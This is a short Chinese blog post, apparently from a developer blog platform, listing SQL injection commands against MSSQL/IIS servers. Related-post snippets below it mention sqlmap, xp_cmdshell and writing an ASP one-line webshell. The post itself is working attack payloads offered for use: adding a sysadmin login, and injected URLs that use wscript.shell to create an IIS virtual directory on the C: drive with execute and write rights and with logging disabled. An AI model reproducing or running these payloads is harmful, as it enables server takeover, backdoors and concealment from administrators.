一些SQL注入中的命令

原创 2006年06月16日 10:02:00

1、加管理员

exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin

 2、加虚拟目录

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/mkwebdir.vbs -c localhost -w "1" -v "0x07c2","c:/"';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bexecute';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bwrite';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bbrowse';exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/chaccess.vbs -a w3svc/1/ROOT/0x07c2 %2Bwrite';--

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/0x07c2/DontLog 1'

http://abc.com/abc.asp?id=1;declare @s varchar(21) set @s='wscript.shell'declare @o int exec sp_oacreate @s,@o out;exec sp_oamethod @o,'run',NULL,'cscript C:/Inetpub/AdminScripts/adsutil.vbs set w3svc/1/root/0x07c2/EnableDefaultDoc 0'

最详细的SQL注入相关的命令整理

  • 2007年08月05日 16:11
  • 102KB
  • 下载

详细SQL注入命令使用方法

sql注入 sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id...

最详细的SQL注入相关的命令整理

1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell...
  • eldn__
  • eldn__
  • 2013年04月20日 16:15
  • 755

参数化命令(防止SQL注入)

1. 参数化命令相关知识点:(防止SQL注入) DAL类: public DataTable StudentDAL(string name,string gender) ...

最详细的SQL注入相关的命令整理

1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell...
  • eldn__
  • eldn__
  • 2013年04月20日 16:16
  • 475

最详细的SQL注入相关的命令整理

1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell...
  • eldn__
  • eldn__
  • 2013年04月20日 16:14
  • 446

在有注入漏洞的SQL服务器上运行CMD命令

利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:    EXEC master.dbo.xp_cmdshell 'dir c:\...
  • eldn__
  • eldn__
  • 2013年04月20日 19:59
  • 730

无xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令

转载:http://www.rrclink.com/itjishu/qitajishu/2012-3-16/10476.html 利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令...

SQL注入分析(手动注入检测) and 手动注入脚本命令精华版

入侵过程主要包括以下几个步骤: 1、测试ASP系统是否有注入漏洞; 2、获取数据库表名; 3、测试管理员ID; 4、测试管理员用户名长度和管理员密码长度; 5、从高到低依...

SQL注入源码+SQL注入命令

  • 2017年07月16日 08:46
  • 900KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:一些SQL注入中的命令
举报原因:
原因补充:

(最多只允许输入30个字)